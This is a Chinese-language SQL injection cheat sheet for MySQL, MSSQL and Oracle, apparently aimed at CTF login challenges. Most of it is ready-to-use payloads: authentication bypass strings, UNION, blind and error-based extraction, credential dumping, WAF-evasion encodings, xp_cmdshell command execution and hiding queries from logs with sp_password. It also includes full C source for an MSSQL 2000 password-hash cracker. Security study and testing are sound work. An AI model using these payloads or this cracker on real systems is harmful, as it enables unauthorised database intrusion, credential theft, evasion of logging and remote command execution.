登录框处可能存在万能密码登录,或者盲注之类的,一般ctf中比较常见。
查询语句:SELECT * FROM Table WHERE username = '';
常用绕过:
' OR '1
' OR 1 -- -
" OR "" = "
" OR 1 = 1 -- -
'='
'LIKE'
'=0--+
Example:SELECT * FROM Users WHERE username = 'Mike' AND password = '' OR '' = '';
注释查询
以下内容可用于注释掉注入时查询的其余部分:
# Hash 注释
/* c风格的注释
-- - SQL 注释
;%00 空字节
` 反引号
Examples:
SELECT * FROM Users WHERE username = '' OR 1=1 -- -' AND password = '';
SELECT * FROM Users WHERE id = '' UNION SELECT 1, 2, 3`';
Note:
反引号只能用于在用作别名时结束查询。
测试版本
变量:
VERSION()
@@VERSION
@@GLOBAL.VERSION
Example:
SELECT * FROM Users WHERE id = '1' AND MID(VERSION(),1,1) = '5';
Note:
如果DBMS在Windows的机器上运行,输出将包含-nt-log。
GROUP/ORDER BY n+1;
Notes:
继续增加数字,直到得到一个False响应。
尽管GROUP BY和ORDER BY在SQL中具有不同的功能,但它们都可以以完全相同的方式用于确定查询中的列数。
Example:
sql语句: SELECT username, password, permission FROM Users WHERE id = '{INJECTION POINT}';
1' ORDER BY 1--+ True
1' ORDER BY 2--+ True
1' ORDER BY 3--+ True
1' ORDER BY 4--+ False - Query is only using 3 columns
-1' UNION SELECT 1,2,3--+ True
基于错误(1)
GROUP/ORDER BY 1,2,3,4,5...
Note:
类似于以前的方法,如果启用报错显示,我们可以检查具有1个请求的列数。
Examples:
sql语句: SELECT username, password, permission FROM Users WHERE id = '{INJECTION POINT}'
1' GROUP BY 1,2,3,4,5--+ Unknown column '4' in 'group statement'
1' ORDER BY 1,2,3,4,5--+ Unknown column '4' in 'order clause'
基于错误(2)
SELECT ... INTO var_list, var_list1, var_list2...
Notes:
如果启用错误显示,此方法有效。
当注入点位于LIMIT子句之后时,查找列数很有用。
Example:
sql语句: SELECT permission FROM Users WHERE id = {INJECTION POINT};
-1 UNION SELECT 1 INTO @,@,@ 使用的SELECT语句具有不同数量的列
-1 UNION SELECT 1 INTO @,@ 使用的SELECT语句具有不同数量的列
-1 UNION SELECT 1 INTO @ 没有错误意味着查询使用1列
Example 2:
sql语句: SELECT username, permission FROM Users limit 1,{INJECTION POINT};
1 INTO @,@,@ 使用的SELECT语句具有不同数量的列
1 INTO @,@ 没有错误意味着查询使用1列
基于错误(3)
AND (SELECT * FROM SOME_EXISTING_TABLE) = 1
Notes:
如果您知道您所使用的表名称,并且启用了错误显示,则此功能可用。
它将返回表中的列的数量,而不是查询。
Example:
sql语句:SELECT permission FROM Users WHERE id = {INJECTION POINT};
1 AND (SELECT * FROM Users) = 1 操作数应该包含3列
检索表名
union
UNION SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE version=10;
Blind
AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables > 'A'
Error
AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),FLOOR(RAND(0)*2)))
(@:=1)||@ GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),!@) HAVING @||MIN(@:=0);
AND ExtractValue(1, CONCAT(0x5c, (SELECT table_name FROM information_schema.tables LIMIT 1)));-- Available in 5.1.5
tips:
version=10 for MySQL 5
检索列名
union
UNION SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'tablename'
Blind
AND SELECT SUBSTR(column_name,1,1) FROM information_schema.columns > 'A'
Error
AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1),FLOOR(RAND(0)*2)))
(@:=1)||@ GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1),!@) HAVING @||MIN(@:=0);
AND ExtractValue(1, CONCAT(0x5c, (SELECT column_name FROM information_schema.columns LIMIT 1)));-- Available in MySQL 5.1.5
AND (1,2,3) = (SELECT * FROM SOME_EXISTING_TABLE UNION SELECT 1,2,3 LIMIT 1)-- Fixed in MySQL 5.1
AND (SELECT * FROM (SELECT * FROM SOME_EXISTING_TABLE JOIN SOME_EXISTING_TABLE b) a)
AND (SELECT * FROM (SELECT * FROM SOME_EXISTING_TABLE JOIN SOME_EXISTING_TABLE b USING (SOME_EXISTING_COLUMN)) a)
PROCEDURE ANALYSE
PROCEDURE ANALYSE()
Web应用程序需要在要注入的SQL查询中显示所选列之一。
Example:
sql语句: SELECT username, permission FROM Users WHERE id = 1;
1 PROCEDURE ANALYSE() 得到第一个列名
1 LIMIT 1,1 PROCEDURE ANALYSE() 得到第二个列名
1 LIMIT 2,1 PROCEDURE ANALYSE() 得到第三个列名
一次检索多个表/列
SELECT (@) FROM (SELECT(@:=0x00),(SELECT (@) FROM (information_schema.columns) WHERE (table_schema>=@) AND (@)IN (@:=CONCAT(@,0x0a,' [ ',table_schema,' ] >',table_name,' > ',column_name))))x
example:
SELECT MID(GROUP_CONCAT(0x3c62723e, 0x5461626c653a20, table_name, 0x3c62723e, 0x436f6c756d6e3a20, column_name ORDER BY (SELECT version FROM information_schema.tables) SEPARATOR 0x3c62723e),1,1024) FROM information_schema.columns
名
从列名查找表名
SELECT table_name FROM information_schema.columns WHERE column_name = 'username';
SELECT table_name FROM information_schema.columns WHERE column_name LIKE '%user%';
从表名中查找列名
SELECT column_name FROM information_schema.columns WHERE table_name = 'Users';
SELECT column_name FROM information_schema.columns WHERE table_name LIKE '%user%';
找出当前的查询
SELECT info FROM information_schema.processlist
tips:
从MySQL 5.1.7开始。
引号绕过
SELECT * FROM Users WHERE username = 0x61646D696E ---> Hex encoding.
SELECT * FROM Users WHERE username = CHAR(97, 100, 109, 105, 110) --> CHAR() Function.
Examples: SELECT FROM Users WHERE ID=1 AND 1=0; INSERT INTO Users(username, password, priv) VALUES ('BobbyTables', 'kl20da$$','admin'); SELECT FROM Users WHERE ID=1 AND 1=0; SHOW COLUMNS FROM Users;
/* -- C风格的评论
- -- SQL注释
;%00 -- 空字节
Example:
SELECT * FROM Users WHERE username = '' OR 1=1 --' AND password = '';
SELECT * FROM Users WHERE id = '' UNION SELECT 1, 2, 3/*';
测试版本
@@VERSION
Example:
True if MSSQL version is 2008.
SELECT * FROM Users WHERE id = '1' AND @@VERSION LIKE '%2008%';
tips:
输出还将包含Windows操作系统的版本。
数据库凭证
数据库..Table master..syslogins, master..sysprocesses
Columns name, loginame
Current User user, system_user, suser_sname(), is_srvrolemember('sysadmin')
Database Credentials SELECT user, password FROM master.dbo.sysxlogins
Example:
返回当前用户:
SELECT loginame FROM master..sysprocesses WHERE spid=@@SPID;
检查当前用户是否是admin:
SELECT (CASE WHEN (IS_SRVROLEMEMBER('sysadmin')=1) THEN '1' ELSE '0' END);
Database Names
Database.Table master..sysdatabases
Column name
Current DB DB_NAME(i)
Examples:
SELECT DB_NAME(5);
SELECT name FROM master..sysdatabases;
猜解列名数量
ORDER BY n+1;
Example:
sql语句: SELECT username, password, permission FROM Users WHERE id = '1';
1' ORDER BY 1-- True
1' ORDER BY 2-- True
1' ORDER BY 3-- True
1' ORDER BY 4-- False - 得出只有三列
-1' UNION SELECT 1,2,3-- True
tips:
让数字一直增加会得到一个错误的请求
以下内容可用于获取当前查询中的列。
GROUP BY / HAVING
Example:
sql语句: SELECT username, password, permission FROM Users WHERE id = '1';
1' HAVING 1=1-- Column 'Users.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
1' GROUP BY username HAVING 1=1-- Column 'Users.password' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
1' GROUP BY username, password HAVING 1=1-- Column 'Users.permission' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
1' GROUP BY username, password, permission HAVING 1=1-- No Error
tips:
所有列都包括在内后,将不会返回任何错误。
猜解表名
我们可以从两个不同的数据库,information_schema.tables或master..sysobjects中检索表。 union
UNION SELECT name FROM master..sysobjects WHERE xtype='U'
Blind
AND SELECT SUBSTRING(table_name,1,1) FROM information_schema.tables > 'A'
Error
AND 1 = (SELECT TOP 1 table_name FROM information_schema.tables)
AND 1 = (SELECT TOP 1 table_name FROM information_schema.tables WHERE table_name NOT IN(SELECT TOP 1 table_name FROM information_schema.tables))
Xtype ='U'用于用户定义的表格。 您可以使用“V”查看。
猜解列名
我们可以从两个不同的数据库,information_schema.columns或masters..syscolumns中检索这些列。 union
UNION SELECT name FROM master..syscolumns WHERE id = (SELECT id FROM master..syscolumns WHERE name = 'tablename')
Blind
AND SELECT SUBSTRING(column_name,1,1) FROM information_schema.columns > 'A'
Blind
AND 1 = (SELECT TOP 1 column_name FROM information_schema.columns)
AND 1 = (SELECT TOP 1 column_name FROM information_schema.columns WHERE column_name NOT IN(SELECT TOP 1 column_name FROM information_schema.columns))
创建一个临时表或列并插入数据:
AND 1=0; BEGIN DECLARE @xy varchar(8000) SET @xy=':' SELECT @xy=@xy+' '+name FROM sysobjects WHERE xtype='U' AND name>@xy SELECT @xy AS xy INTO TMP_DB END;
转储内容:
AND 1=(SELECT TOP 1 SUBSTRING(xy,1,353) FROM TMP_DB);
删除表:
AND 1=0; DROP TABLE TMP_DB;
一个更简单的方法是从MSSQL 2005及更高版本开始。 XML函数path()作为一个连接器,允许用1个查询检索所有表。:
SELECT table_name %2b ', ' FROM information_schema.tables FOR XML PATH('')
你也可以讲你的查询语句编码:
' AND 1=0; DECLARE @S VARCHAR(4000) SET @S=CAST(0x44524f50205441424c4520544d505f44423b AS VARCHAR(4000)); EXEC (@S);--
引号绕过
SELECT * FROM Users WHERE username = CHAR(97) + CHAR(100) + CHAR(109) + CHAR(105) + CHAR(110)
字符串连接
SELECT CONCAT('a','a','a'); (SQL SERVER 2012)
SELECT 'a'+'d'+'mi'+'n';
条件声明
IF
CASE
Examples:
IF 1=1 SELECT 'true' ELSE SELECT 'false';
SELECT CASE WHEN 1=1 THEN true ELSE false END;
定时
WAITFOR DELAY 'time_to_pass';
WAITFOR TIME 'time_to_execute';
Example:
IF 1=1 WAITFOR DELAY '0:0:5' ELSE WAITFOR DELAY '0:0:0';
OPENROWSET攻击
SELECT * FROM OPENROWSET('SQLOLEDB', '127.0.0.1';'sa';'p4ssw0rd', 'SET FMTONLY OFF execute master..xp_cmdshell "dir"');
' IF EXISTS (SELECT 1 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME='TMP_DB') DROP TABLE TMP_DB DECLARE @a varchar(8000) IF EXISTS(SELECT * FROM dbo.sysobjects WHERE id = object_id (N'[dbo].[xp_cmdshell]') AND OBJECTPROPERTY (id, N'IsExtendedProc') = 1) BEGIN CREATE TABLE %23xp_cmdshell (name nvarchar(11), min int, max int, config_value int, run_value int) INSERT %23xp_cmdshell EXEC master..sp_configure 'xp_cmdshell' IF EXISTS (SELECT * FROM %23xp_cmdshell WHERE config_value=1)BEGIN CREATE TABLE %23Data (dir varchar(8000)) INSERT %23Data EXEC master..xp_cmdshell 'dir' SELECT @a='' SELECT @a=Replace(@a%2B'<br></font><font color="black">'%2Bdir,'<dir>','</font><font color="orange">') FROM %23Data WHERE dir>@a DROP TABLE %23Data END ELSE SELECT @a='xp_cmdshell not enabled' DROP TABLE %23xp_cmdshell END ELSE SELECT @a='xp_cmdshell not found' SELECT @a AS tbl INTO TMP_DB--
转储内容:
' UNION SELECT tbl FROM TMP_DB--
删除表:
' DROP TABLE TMP_DB--
SP_PASSWORD(隐藏查询)
将sp_password附加到查询的末尾会将其从T-SQL日志中隐藏,作为安全措施。
SP_PASSWORD
Example:
' AND 1=1--sp_password
Output:
-- 'sp_password' was found in the text of this event.
-- The text has been replaced with this comment for security reasons.
堆查询
MSSQL 支持堆查询
Example:
' AND 1=0 INSERT INTO ([column1], [column2]) VALUES ('value1', 'value2');
Fuzz
以下字符可以用作空格。
01 Start of Heading
02 Start of Text
03 End of Text
04 End of Transmission
05 Enquiry
06 Acknowledge
07 Bell
08 Backspace
09 Horizontal Tab
0A New Line
0B Vertical Tab
0C New Page
0D Carriage Return
0E Shift Out
0F Shift In
10 Data Link Escape
11 Device Control 1
12 Device Control 2
13 Device Control 3
14 Device Control 4
15 Negative Acknowledge
16 Synchronous Idle
17 End of Transmission Block
18 Cancel
19 End of Medium
1A Substitute
1B Escape
1C File Separator
1D Group Separator
1E Record Separator
1F Unit Separator
20 Space
25
22 "
28 (
29 )
5B [
5D ]
Examples:
S%E%L%E%C%T%01column%02FROM%03table;
A%%ND 1=%%%%%%%%1;
UNION(SELECT(column)FROM(table));
SELECT"table_name"FROM[information_schema].[tables];
tips:
关键字之间的百分比符号只能在ASP(x)Web应用程序上使用。
AND/OR后允许的特征
01 - 20 Range
21 !
2B +
2D -
2E .
5C \
7E ~
Example:
SELECT 1FROM[table]WHERE\1=\1AND\1=\1;
tips:
反斜杠似乎不适用于MSSQL 2000。
编码
编码有时可以bypass WAF/IDS.
URL Encoding >>>> SELECT %74able_%6eame FROM information_schema.tables;
Double URL Encoding SELECT %2574able_%256eame FROM information_schema.tables;
Unicode Encoding >>>> SELECT %u0074able_%u6eame FROM information_schema.tables;
Invalid Hex Encoding (ASP) >>>> SELECT %tab%le_%na%me FROM information_schema.tables;
Hex Encoding >>>> ' AND 1=0; DECLARE @S VARCHAR(4000) SET @S=CAST(0x53454c4543542031 AS VARCHAR(4000)); EXEC (@S);--
HTML Entities (Needs to be verified) %26%2365%3B%26%2378%3B%26%2368%3B%26%2332%3B%26%2349%3B%26%2361%3B%26%2349%3B
Password Cracking A Metasploit module for JTR can be found here.
MSSQL 2000 Password Cracker
This tool is designed to crack Microsoft SQL Server 2000 passwords.
/////////////////////////////////////////////////////////////////////////////////
//
// SQLCrackCl
//
// This will perform a dictionary attack against the
// upper-cased hash for a password. Once this
// has been discovered try all case variant to work
// out the case sensitive password.
//
// This code was written by David Litchfield to
// demonstrate how Microsoft SQL Server 2000
// passwords can be attacked. This can be
// optimized considerably by not using the CryptoAPI.
//
// (Compile with VC++ and link with advapi32.lib
// Ensure the Platform SDK has been installed, too!)
//
//////////////////////////////////////////////////////////////////////////////////
#include <stdio.h>
#include <windows.h>
#include <wincrypt.h>
FILE *fd=NULL;
char *lerr = "\nLength Error!\n";
int wd=0;
int OpenPasswordFile(char *pwdfile);
int CrackPassword(char *hash);
int main(int argc, char *argv[])
{
int err = 0;
if(argc !=3)
{
printf("\n\n*** SQLCrack *** \n\n");
printf("C:\\>%s hash passwd-file\n\n",argv[0]);
printf("David Litchfield (david@ngssoftware.com)\n");
printf("24th June 2002\n");
return 0;
}
err = OpenPasswordFile(argv[2]);
if(err !=0)
{
return printf("\nThere was an error opening the password file %s\n",argv[2]);
}
err = CrackPassword(argv[1]);
fclose(fd);
printf("\n\n%d",wd);
return 0;
}
int OpenPasswordFile(char *pwdfile)
{
fd = fopen(pwdfile,"r");
if(fd)
return 0;
else
return 1;
}
int CrackPassword(char *hash)
{
char phash[100]="";
char pheader[8]="";
char pkey[12]="";
char pnorm[44]="";
char pucase[44]="";
char pucfirst[8]="";
char wttf[44]="";
char uwttf[100]="";
char *wp=NULL;
char *ptr=NULL;
int cnt = 0;
int count = 0;
unsigned int key=0;
unsigned int t=0;
unsigned int address = 0;
unsigned char cmp=0;
unsigned char x=0;
HCRYPTPROV hProv=0;
HCRYPTHASH hHash;
DWORD hl=100;
unsigned char szhash[100]="";
int len=0;
if(strlen(hash) !=94)
{
return printf("\nThe password hash is too short!\n");
}
if(hash[0]==0x30 && (hash[1]== 'x' || hash[1] == 'X'))
{
hash = hash + 2;
strncpy(pheader,hash,4);
printf("\nHeader\t\t: %s",pheader);
if(strlen(pheader)!=4)
return printf("%s",lerr);
hash = hash + 4;
strncpy(pkey,hash,8);
printf("\nRand key\t: %s",pkey);
if(strlen(pkey)!=8)
return printf("%s",lerr);
hash = hash + 8;
strncpy(pnorm,hash,40);
printf("\nNormal\t\t: %s",pnorm);
if(strlen(pnorm)!=40)
return printf("%s",lerr);
hash = hash + 40;
strncpy(pucase,hash,40);
printf("\nUpper Case\t: %s",pucase);
if(strlen(pucase)!=40)
return printf("%s",lerr);
strncpy(pucfirst,pucase,2);
sscanf(pucfirst,"%x",&cmp);
}
else
{
return printf("The password hash has an invalid format!\n");
}
printf("\n\n Trying...\n");
if(!CryptAcquireContextW(&hProv, NULL , NULL , PROV_RSA_FULL ,0))
{
if(GetLastError()==NTE_BAD_KEYSET)
{
// KeySet does not exist. So create a new keyset
if(!CryptAcquireContext(&hProv,
NULL,
NULL,
PROV_RSA_FULL,
CRYPT_NEWKEYSET ))
{
printf("FAILLLLLLL!!!");
return FALSE;
}
}
}
while(1)
{
// get a word to try from the file
ZeroMemory(wttf,44);
if(!fgets(wttf,40,fd))
return printf("\nEnd of password file. Didn't find the password.\n");
wd++;
len = strlen(wttf);
wttf[len-1]=0x00;
ZeroMemory(uwttf,84);
// Convert the word to UNICODE
while(count < len)
{
uwttf[cnt]=wttf[count];
cnt++;
uwttf[cnt]=0x00;
count++;
cnt++;
}
len --;
wp = &uwttf;
sscanf(pkey,"%x",&key);
cnt = cnt - 2;
// Append the random stuff to the end of
// the uppercase unicode password
t = key >> 24;
x = (unsigned char) t;
uwttf[cnt]=x;
cnt++;
t = key << 8;
t = t >> 24;
x = (unsigned char) t;
uwttf[cnt]=x;
cnt++;
t = key << 16;
t = t >> 24;
x = (unsigned char) t;
uwttf[cnt]=x;
cnt++;
t = key << 24;
t = t >> 24;
x = (unsigned char) t;
uwttf[cnt]=x;
cnt++;
// Create the hash
if(!CryptCreateHash(hProv, CALG_SHA, 0 , 0, &hHash))
{
printf("Error %x during CryptCreatHash!\n", GetLastError());
return 0;
}
if(!CryptHashData(hHash, (BYTE *)uwttf, len*2+4, 0))
{
printf("Error %x during CryptHashData!\n", GetLastError());
return FALSE;
}
CryptGetHashParam(hHash,HP_HASHVAL,(byte*)szhash,&hl,0);
// Test the first byte only. Much quicker.
if(szhash[0] == cmp)
{
// If first byte matches try the rest
ptr = pucase;
cnt = 1;
while(cnt < 20)
{
ptr = ptr + 2;
strncpy(pucfirst,ptr,2);
sscanf(pucfirst,"%x",&cmp);
if(szhash[cnt]==cmp)
cnt ++;
else
{
break;
}
}
if(cnt == 20)
{
// We've found the password
printf("\nA MATCH!!! Password is %s\n",wttf);
return 0;
}
}
count = 0;
cnt=0;
}
return 0;
}
0x03 Oracle
默认数据库
SYSTEM 所有版本
SYSAUX 所有版本
注释查询
以下内容可用于注释后的其余查询:
-- SQL comment
Example:
SELECT * FROM Users WHERE username = '' OR 1=1 --' AND password = '';
测试版本
SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
SELECT version FROM v$instance;
tips:
Oracle中的所有SELECT语句都必须包含一个表。
dual是一个可用于测试的虚拟表.
Database Credentials
SELECT username FROM all_users; -- 所有版本
SELECT name, password from sys.user$; -- Privileged, <= 10g
SELECT name, spare4 from sys.user$; -- Privileged, <= 11g
数据库名
当前数据库
SELECT name FROM v$database;
SELECT instance_name FROM v$instance
SELECT global_name FROM global_name
SELECT SYS.DATABASE_NAME FROM DUAL
用户数据库
SELECT DISTINCT owner FROM all_tables;
服务主机名
SELECT host_name FROM v$instance; (Privileged)
SELECT UTL_INADDR.get_host_name FROM dual;
SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual;
SELECT UTL_INADDR.get_host_address FROM dual;
表名和列名
猜解表名
SELECT table_name FROM all_tables;
猜解列名:
SELECT column_name FROM all_tab_columns;
从列名查找表
SELECT column_name FROM all_tab_columns WHERE table_name = 'Users';
从表名查找列
SELECT table_name FROM all_tab_tables WHERE column_name = 'password';
一次检索多个表
SELECT RTRIM(XMLAGG(XMLELEMENT(e, table_name || ',')).EXTRACT('//text()').EXTRACT('//text()') ,',') FROM all_tables;
避免使用引号
与其他RDBMS不同,Oracle允许对表/列名进行编码。
SELECT 0x09120911091 FROM dual; Hex Encoding.
SELECT CHR(32)||CHR(92)||CHR(93) FROM dual; CHR() Function.
字符串连接
SELECT 'a'||'d'||'mi'||'n' FROM dual;
条件声明
SELECT CASE WHEN 1=1 THEN 'true' ELSE 'false' END FROM dual
延时
Time Delay
SELECT UTL_INADDR.get_host_address('non-existant-domain.com') FROM dual;
Heavy Time Delays
AND (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) > 0 AND 300 > ASCII(SUBSTR((SELECT username FROM all_users WHERE rownum = 1),1,1));
提权
SELECT privilege FROM session_privs;
SELECT grantee, granted_role FROM dba_role_privs; (Privileged)
DNS Requests
SELECT UTL_HTTP.REQUEST('http://localhost') FROM dual;
SELECT UTL_INADDR.get_host_address('localhost.com') FROM dual;